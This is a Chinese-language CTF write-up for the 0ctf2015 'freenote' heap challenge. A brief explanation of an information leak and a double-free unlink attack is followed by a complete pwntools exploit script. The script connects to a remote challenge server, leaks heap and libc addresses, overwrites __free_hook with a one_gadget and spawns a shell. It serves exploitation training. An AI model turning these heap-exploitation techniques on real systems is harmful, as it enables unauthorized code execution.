0ctf2015_freenote
查看保护
第一个漏洞,没有\x00
第二个漏洞,没有清0,这里看成uaf就行
攻击思路:借助第一个漏洞泄露出heap_addr和libc。借助第二个漏洞形成double free进行unlink攻击
1.泄露heap_addr和libc
因为read的时候没有\x00,所以释放成unsortedbin再申请回来的时候填满fd,show的时候可以带着bk一同输出。
2.heap全都清掉,为unlink做准备
3.布置unlink,还要利用第二步heap全部清掉时合并到top_chunk中的chunk
4.因为第三步的unlink布置使得top_chunk中的chunk被使用,而delete可以达成double free所以执行unlink攻击
5.改0 chunk为free_hook改hook为one_gadget
注:unlink和double free利用手法可以看z1r0’s blog
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
debug = 1
if debug:
r = remote('node4.buuoj.cn', 25918)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
menu = 'Your choice: '
def add(size, note):
r.sendlineafter(menu, '2')
r.sendlineafter('Length of new note: ', str(size))
r.sendafter('Enter your note:', note)
def show():
r.sendlineafter(menu, '1')
def edit(index, size, note):
r.sendlineafter(menu, '3')
r.sendlineafter('Note number: ', str(index))
r.sendlineafter('Length of note: ', str(size))
r.sendafter('Enter your note: ', note)
def delete(index):
r.sendlineafter(menu, '4')
r.sendlineafter('Note number: ', str(index))
add(1, 'a') #0
add(1, 'a') #1
add(1, 'a') #2
add(1, 'a') #3
delete(0)
delete(2)
add(8, 'b' * 8)
add(8, 'c' * 8)
dbg()
show()
r.recvuntil('b' * 8)
heap_addr = u64(r.recv(4).strip().ljust(8, b'\x00')) - 0x1940
li('[+] heap_addr = ' + hex(heap_addr))
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 88 - 0x10
li('[+] malloc_hook = ' + hex(malloc_hook))
libc = ELF('./libc-2.23.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_gadget = one[1] + libc_base
fd = p64(heap_addr + 0x30 - 0x18)
bk = p64(heap_addr + 0x30 - 0x10)
delete(3)
delete(2)
delete(1)
delete(0)
#p1 = p64(0) + p64(0x31) + fd + bk + p64(0x20) + p64(0)
p1 = p64(0) + p64(0x51) + fd + bk
p1 += b'A' * 0x30 + p64(0x50) + p64(0x20)
add(len(p1), p1)
p2 = b'A' * 0x80 + p64(0x110) + p64(0x90) + b'A' * 0x80
p2 += p64(0) + p64(0x71) + b'A' * 0x60
add(len(p2), p2)
delete(2)
p3 = p64(8) + p64(0x1) + p64(0x8) + p64(free_hook) + b'A' * 0x40
edit(0, len(p3), p3)
edit(0, len(p64(one_gadget)), p64(one_gadget))
delete(1)
r.interactive()